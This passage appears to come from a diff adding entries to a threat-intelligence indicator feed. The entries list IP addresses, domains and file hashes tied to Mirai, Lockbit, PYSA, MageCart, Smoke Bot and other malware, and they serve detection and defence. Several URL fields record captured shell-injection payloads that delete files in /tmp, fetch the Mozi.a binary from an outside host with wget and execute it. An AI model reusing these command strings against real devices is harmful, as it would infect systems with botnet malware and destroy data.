"192.172.232.47" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "3d226ba2b5733008ff8c480406440c1af62e59c1", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17271924169523, + "ip": [ + "64.7.198.58" + ], + "malwareList": null, + "threatList": [ + { + "name": "Gamaredon", + "title": "Gamaredon - New indicators have been found" + } + ] + }, + { + "id": "cde02b93d6ebc2d797b17bc1995c8723eff495e5", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17271948103538, + "ip": [ + "123.185.228.120" + ], + "malwareList": null, + "threatList": [ + { + "name": "Maze", + "title": "Maze - New indicators have been found" + } + ] + }, + { + "id": "f5888d4f085228afaaba8501d3305613d1d3bfcb", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17271978144377, + "ip": [ + "18.140.249.150" + ], + "malwareList": null, + "threatList": [ + { + "name": "PYSA", + "title": "PYSA - New indicators have been found" + } + ] + }, + { + "id": "26a07525de5f8a75d5125bbd6aaa505e89aac628", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17271978163913, + "ip": [ + "35.183.5.23" + ], + "malwareList": null, + "threatList": [ + { + "name": "PYSA", + "title": "PYSA - New indicators have been found" + } + ] + }, + { + "id": "b1eff6728f2d3df960af15671817f4cea22d1137", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17271978164559, + "ip": [ + "18.183.74.18" + ], + "malwareList": null, + "threatList": [ + { + "name": "PYSA", + "title": "PYSA - New indicators have been found" + } + ] + }, + { + "id": "a74a36bc0bb2c7a7e69243c98225013a73e72fd0", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17271984178226, + "ip": [ + "8.152.159.89" + ], + "malwareList": null, + "threatList": [ + { + "name": "Lockbit", + "title": "Lockbit - New indicators have been found" + } + ] + }, + { + "id": "2deeb3486f08db7b525215eb99956f7d4dc31390", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "url": "http://91.241.86.2/shell?cd+/tmp;rm+-rf+*;wget+http:/195.22.245.159:47052/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17271985728253, + "ip": [ + "91.241.86.2" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "911a35fbf9a8dd473326de1861da7cbb6df86bef", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-10-09T00:00:00+03:00", + "seqUpdate": 17271985808349, + "ip": [ + "195.22.245.159" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "c6455b2f808f453962ca103bedbb2bd3248f797a", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17271996241948, + "ip": [ + "164.68.105.133" + ], + "malwareList": [ + { + "name": "Onimiki", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "3add286b04f1c3a35cfe44f13f5c6ad95b2d919d", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17272002119844, + "ip": [ + "5.188.87.43" + ], + "malwareList": null, + "threatList": [ + { + "name": "Infra Storm", + "title": "Infra Storm - New indicators have been found" + } + ] + }, + { + "id": "261ebae6a1e797d6e85455e2594a7ef72b3c05e5", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "url": "http://194.143.143.234/shell?cd+/tmp;rm+-rf+*;wget+http:/192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17272028931661, + "ip": [ + "194.143.143.234" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "9b6031f5675057516f3e6fe912de9ccdef8b903c", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17272029011751, + "ip": [ + "27.47.2.155" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "6e5f0e97e7d96edffe1fff5e4b54017c24320d16", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "url": "http://91.241.87.53/shell?cd+/tmp;rm+-rf+*;wget+http:/192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17272132318667, + "ip": [ + "91.241.87.53" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "b9edf0c67ea82ff2d3f066b52fe21652b45da2ec", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17272132329141, + "ip": [ + "120.85.113.51" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "1588a4d340b710e566d33e0269b8944f17fee108", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "domain": "myhealthscap.us", + "seqUpdate": 17272147675605, + "malwareList": null, + "threatList": [ + { + "name": "Trung", + "title": "Trung - New indicators have been found" + } + ] + }, + { + "id": "93da2f2ac9a35a36bc98ffe890226766af0c0f04", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "domain": "areariservata.tsrm-pstrp-toaoalat.org", + "url": "https://areariservata.tsrm-pstrp-toaoalat.org/GponForm/diag_Form?images/", + "seqUpdate": 17272152489171, + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "712e84164c38c36a7bad197536a4476c4eebd225", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "url": "https://185.186.93.219:80/shell?cd+/tmp;rm+-rf+*;wget+http://81.235.157.102:48997/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17272218956578, + "ip": [ + "185.186.93.219" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "0e44ca1a7ec2fb8f37cb613245c4bc50d1615502", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "url": "http://185.186.93.219/shell?cd+/tmp;rm+-rf+*;wget+http:/81.235.157.102:48997/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17272218977148, + "ip": [ + "185.186.93.219" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "4e6b0e5742da31b183ef8b6d98ef6e2fe1dd2c82", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17272219017784, + "ip": [ + "81.235.157.102" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "2681920a786dcf41f82e1a9df4a9f1885d487f3f", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-10-07T00:00:00+03:00", + "url": "http://192.172.232.151/shell?cd+/tmp;rm+-rf+*;wget+http:/192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17272254209787, + "ip": [ + "192.172.232.151" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "b52d54ffc96727a8609835c7bb4532ec377b05a5", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272254280182, + "ip": [ + "120.86.252.132" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "0736e8b081a85bef828453ae0a1f86be3fffd44f", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "url": "http://195.88.234.18/shell?cd+/tmp;rm+-rf+*;wget+http:/192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17272277221964, + "ip": [ + "195.88.234.18" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "9b22e63380d0760ef6d9ac7bcc54b58d323dbd75", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272277302054, + "ip": [ + "120.86.254.18" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "ca2bd107d22585412ede7cd29fe387aa0aa025c0", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-10-13T00:00:00+03:00", + "url": "http://194.143.143.184/shell?cd+/tmp;rm+-rf+*;wget+http:/192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17272290148979, + "ip": [ + "194.143.143.184" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "a5dce542b57736dd0a4eaac636e0e75c8199b993", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272290229058, + "ip": [ + "120.86.253.47" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "7ad6fb99c256de0398e95a9827b5a69e0c79a75d", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "www.giua.edu.it", + "url": "https://www.giua.edu.it/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17272389422269, + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "b056da19e75296a3202169154c171f9efae7f955", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "url": "http://82.85.155.133/shell?cd+/tmp;rm+-rf+*;wget+http:/192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17272389422270, + "ip": [ + "82.85.155.133" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "8d79ec10034224ce295b7a7413e912c59cf3875c", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272389502347, + "ip": [ + "120.86.252.150" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "356559715189a1680f4228b56257d4cbf76bdd3a", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-10-18T00:00:00+03:00", + "url": "https://185.186.93.133:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17272425640705, + "ip": [ + "185.186.93.133" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "81a1298b18f41c9db1cdfeb4dfb1a3876b259477", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-10-18T00:00:00+03:00", + "url": "http://185.186.93.133/shell?cd+/tmp;rm+-rf+*;wget+http:/192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17272425720794, + "ip": [ + "185.186.93.133" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "2c45e6992af0f02da46779b31edd63aad28510d0", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272425800895, + "ip": [ + "120.86.254.1" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "ec0aa3c5a4c1dfdd04670fbd1c80a290b8d52b61", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "ban371.com", + "seqUpdate": 17272482149512, + "malwareList": null, + "threatList": [ + { + "name": "MageCart", + "title": "MageCart - New indicators have been found" + } + ] + }, + { + "id": "514cab3d8d33f909c5d09ef4616a4e5f88a15f85", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "gz-zhentong.com", + "seqUpdate": 17272482150157, + "malwareList": null, + "threatList": [ + { + "name": "MageCart", + "title": "MageCart - New indicators have been found" + } + ] + }, + { + "id": "355ec732a3429e3574e4235d486111447ffe2d18", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "hnjtsy.com", + "seqUpdate": 17272482151002, + "malwareList": null, + "threatList": [ + { + "name": "MageCart", + "title": "MageCart - New indicators have been found" + } + ] + }, + { + "id": "54124f4a62f2d0ff8eca7003b6d3ee7a8dcc5ff8", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "029jcyy.com", + "seqUpdate": 17272482151675, + "malwareList": null, + "threatList": [ + { + "name": "MageCart", + "title": "MageCart - New indicators have been found" + } + ] + }, + { + "id": "a23d9de339f4639c8abb2632904ebc5bf7d72612", + "type": "file", + "dateFirstSeen": "2024-09-23T00:00:00+03:00", + "dateLastSeen": "2024-09-23T00:00:00+03:00", + "seqUpdate": 17272563680736, + "hash": [ + "67abb96be4be1e0e832c0d9c431c9bb7", + "7b5b3977fe1915503a91fce0c1ac03cbad8b671a", + "5aa81b94f9f9cae6d6b2d40836b1a2e7f3330c81e229631b6d8e3a0367e4c73a" + ], + "malwareList": [ + { + "name": "Loki PWS", + "aliases": [ + "Loki Bot", + "Primarypass", + "LokiBot" + ] + } + ], + "threatList": null + }, + { + "id": "ee654d9f89a21623237914d68afb016a7eb438d7", + "type": "file", + "dateFirstSeen": "2024-09-23T00:00:00+03:00", + "dateLastSeen": "2024-09-23T00:00:00+03:00", + "seqUpdate": 17272563681147, + "hash": [ + "63ee4894adb2cb12591d06a43291f724", + "f61321202e3b175fe1f553984b1de3fe0ea9bba9", + "9dc109035bc4cf133bbd4ef89b110075e54d4a0920031577dc48e6c9dc41258b" + ], + "malwareList": [ + { + "name": "Loki PWS", + "aliases": [ + "Loki Bot", + "Primarypass", + "LokiBot" + ] + } + ], + "threatList": null + }, + { + "id": "f1087375afdade77a35452000351f3f15b065c53", + "type": "file", + "dateFirstSeen": "2024-09-23T00:00:00+03:00", + "dateLastSeen": "2024-09-23T00:00:00+03:00", + "seqUpdate": 17272563681419, + "hash": [ + "a2b6f0dea4a17d6965ba9f07f7f088f8", + "027cca9ce25baed655452dd86a5be6cae5f1bdb5", + "ebd44e063ab8a49d0e3c2977fee41283478f9d9ad3c0d2e67d9339bd3c111ba9" + ], + "malwareList": [ + { + "name": "Loki PWS", + "aliases": [ + "Loki Bot", + "Primarypass", + "LokiBot" + ] + } + ], + "threatList": null + }, + { + "id": "59a835c5918b8abfc73ee41c1f08c7f7074f74fd", + "type": "file", + "dateFirstSeen": "2024-09-23T00:00:00+03:00", + "dateLastSeen": "2024-09-23T00:00:00+03:00", + "seqUpdate": 17272565922179, + "hash": [ + "e7bf5eebf8f9ea61a08d7cd16998331c", + "b4cd8c7f444362beb1c745ba1652c0dc77dd4076", + "5e639d8ba3872cf73add9786a73bb2e921229e6203f0860f1953fa7a696096aa" + ], + "malwareList": [ + { + "name": "", + "aliases": null + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "4f0736a7ea1fc526cf4a61aa032507c65e78207c", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272565922386, + "hash": [ + "b8821b7c85e65be84bba8312866db434", + "88e248bb30bdad6468135f2735983d5193bb2873", + "038d9be8465938d21365b05c92c3b576c9363c79eae1bdc2af9cbe9b7839804c" + ], + "malwareList": [ + { + "name": "", + "aliases": null + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "a80e06c258b6191da5e6f2938370816b1cdc10bc", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272565922612, + "hash": [ + "3ea06838fe2c1022fa0b44a68d532184", + "c7e623bf32ca7ca9df59369aae25bce4fb6f9dad", + "f29c488f154678650a4a1eeb6d6ea22373dee25ce391c32dd319a1802ecb6f37" + ], + "malwareList": [ + { + "name": "", + "aliases": null + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "5b818ff013e5c99a1921cb5d024c2ce868e074cb", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272565922817, + "hash": [ + "cd4e6ebe5ae80e5666724948193ab1dc", + "36945ce54c7eb2aa605e62813d6602336280938e", + "0c8cf7cf9432bce6f0f873a5a6bc49b38408d2d39f13baa0ae3ded2df9789b44" + ], + "malwareList": [ + { + "name": "", + "aliases": null + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "23ee524516ebd835f91e811a3900c80fc140470b", + "type": "file", + "dateFirstSeen": "2024-09-23T00:00:00+03:00", + "dateLastSeen": "2024-09-23T00:00:00+03:00", + "seqUpdate": 17272566601090, + "hash": [ + "da0bf0c618afdcec9df34d437794e4c0", + "f85223bf5b04d6eceb04baeee97825b060337dd5", + "e25240231baa27e14f83428e060074197a63affbcf6f1c7990aa4a3115d4b7fd" + ], + "malwareList": [ + { + "name": "NanoCore", + "aliases": [ + "Nancrat" + ] + } + ], + "threatList": null + }, + { + "id": "359222efe128ddbdb38b099155bc8823d73aa86d", + "type": "file", + "dateFirstSeen": "2024-09-23T00:00:00+03:00", + "dateLastSeen": "2024-09-23T00:00:00+03:00", + "seqUpdate": 17272598705635, + "hash": [ + "59ed26b2b0871b6e44354b7be8b37841", + "57a408067bf05a900a10e6ca5e324752578ed4c0", + "29b1e38bdbf3911d09fd1ba9497763bf43cae1ac362ed12752ec03c13902c71a" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "dcd952c2e47a80584deed5084ed8a9e3249e4bf4", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "gateway.luccacrea.it", + "url": "https://gateway.luccacrea.it?cd+/tmp;rm+-rf+*;wget+http://14.153.215.21:60552/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17272624329832, + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "abeccb6083819c9a318f2853cc68ff20d5cd5ea4", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "url": "http://185.186.95.30/shell?cd+/tmp;rm+-rf+*;wget+http:/14.153.215.21:60552/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17272624329832, + "ip": [ + "185.186.95.30" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "0aac6c1c77d630dd2f678e0135b84b767c55422e", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272624329935, + "ip": [ + "14.153.215.21" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "a61da31617d6936c55c400deee223804fc0565a4", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-10-09T00:00:00+03:00", + "url": "http://91.241.86.16/shell?cd+/tmp;rm+-rf+*;wget+http:/192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17272626751479, + "ip": [ + "91.241.86.16" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "3c2a8b2d6d4506efb78d2b7598c9c4c5d1934c9c", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272626751559, + "ip": [ + "120.85.117.170" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "080b26b2c5622d7540d395cfae98e156b2aa9da7", + "type": "file", + "dateFirstSeen": "2024-09-23T00:00:00+03:00", + "dateLastSeen": "2024-09-23T00:00:00+03:00", + "seqUpdate": 17272628055169, + "hash": [ + "839557b603813c7f69a746038f0a811c", + "0e5591c5177e7cdd71fa9eece62d9c84f3012210", + "bb88299d84c5d91fe877681b606f2fa1cc52be53b7dad9a5da07d97a45e5a28b" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "ba1e7f6c3094798ba4f06a13e682a701b5db1621", + "type": "file", + "dateFirstSeen": "2024-09-23T00:00:00+03:00", + "dateLastSeen": "2024-09-23T00:00:00+03:00", + "seqUpdate": 17272628102517, + "hash": [ + "0e2db7174e5c3204e0bf0dc9c9d1e851", + "2e16040a6d7f0f7680ae1a3af18966db0ff52ec8", + "ac52fa38ae392565d490fe43680342f43633697581f6b703ef27796c275ac12a" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "9aa7a765e1e21e961a62de4d0ebc19b063c009a8", + "type": "file", + "dateFirstSeen": "2024-09-23T00:00:00+03:00", + "dateLastSeen": "2024-09-23T00:00:00+03:00", + "seqUpdate": 17272628102754, + "hash": [ + "34e07317817ca03f5eb4566851fe0cf3", + "53aa6a1e3ca6e956c33f2b217649977aa1bb7ac3", + "03d00112c73404cd29f4eb191574376b580a1c1cf38560d07e988ccea2006e3e" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "dd73c83c2f80a8c28f87be71556a5ed5cb9dd3cc", + "type": "file", + "dateFirstSeen": "2024-09-23T00:00:00+03:00", + "dateLastSeen": "2024-09-23T00:00:00+03:00", + "seqUpdate": 17272628103000, + "hash": [ + "e7737c0050348741b60eeb5f98d96e16", + "66cbb84c65984c1ae1ff3f7617de65dd59e9eee4", + "b76e4bcba8728ee64e7982fdafff2960385ac8d5bc3ead203116e78d3914a62e" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "e4ab0c1d4ab049785c52c1ffaf592d835591c4e9", + "type": "file", + "dateFirstSeen": "2024-09-23T00:00:00+03:00", + "dateLastSeen": "2024-09-23T00:00:00+03:00", + "seqUpdate": 17272628103261, + "hash": [ + "70fb2a6dd3c20b91ae1a355ab5275294", + "3d90326a777d3a92f9403a5355c43e741cf2f1ea", + "89b8b6d6191ea06cf92ba5cfb80b1d75af6a12c56f91fc493712c2a106e06dfd" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "5d2515e0ff61f954216baae18daffbd9736ab7e1", + "type": "file", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17272628103606, + "hash": [ + "7b71341bde89a84db53a596366c34b40", + "e5450a4deb07ac04a149d680457b62ef67ff00c5", + "5d75c5a445ada7ecaac1d207b06d82e5498a5e7750360fb1e77b522f4a0bdb2b" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "902946fc59615e0ce4f84dfdece34e0b56749c62", + "type": "file", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17272628103850, + "hash": [ + "446bc9f4f93332387c541d690647979b", + "7ef0292351eba18920e82eeff4062556d89e243c", + "46ce9250b71d6356287236f5e74145238e1366b8ab427d3ea8503f93be845b0d" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "5da272c350dc921ca0e90477b93004fdadcb0fcc", + "type": "file", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17272628104131, + "hash": [ + "dfcca3305fa197f2c7978001010ce5b9", + "c2546639b367c96197122ab94c1fcadedbfd740d", + "7a471eb25ad5d5aeae8d299be9b3265813a220de4b461a7821ededafc8d17bc3" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "911c773d1fd27e00919372fa1996226a0853e46a", + "type": "file", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17272628104378, + "hash": [ + "6f2aeff65a2330f439abce4cdf1b4466", + "36bdb2d35319babccf3c63f4506797ab18bf5293", + "3e36a91c7d9241ae140161ad5bd16277499bf791bae6661133e70d90e3e6f777" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "bb478ec894cb47aa89b0eea0318c6c672eb6bd85", + "type": "file", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17272628104738, + "hash": [ + "393b94c4aa1cb77ce93467a7391ad6da", + "5940bb7ff6a973edbcb5c213f5be3256c68a31bc", + "0a1d0c2f6b462ec3c883bb4ec76f0b0ea28ff4f533bc92e7446db102f97073ca" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "db8c06feb2c459f66348caf94e25f3114bd13664", + "type": "file", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17272628161697, + "hash": [ + "8635497364188512e254da7e1be5bcf7", + "e7d5f1e731383d3ddcd7ceafa2c1df0f3792635d", + "1f5337e14a345000dd1f8bcf75f6d26d276788892adf8f338a899620e1bbb3c4" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "f6dac7160fcdf9fb21b99ec44e34a1aef5844e07", + "type": "file", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17272628161922, + "hash": [ + "bfbf672202b5366a07948787fc8a7612", + "fbcfec926679b277e426658ca2cf4b5b59fb20ac", + "f4314b5b937962c06f0a489a2256a4f2732fc3d08c1067c2c51ae4670c00a492" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + 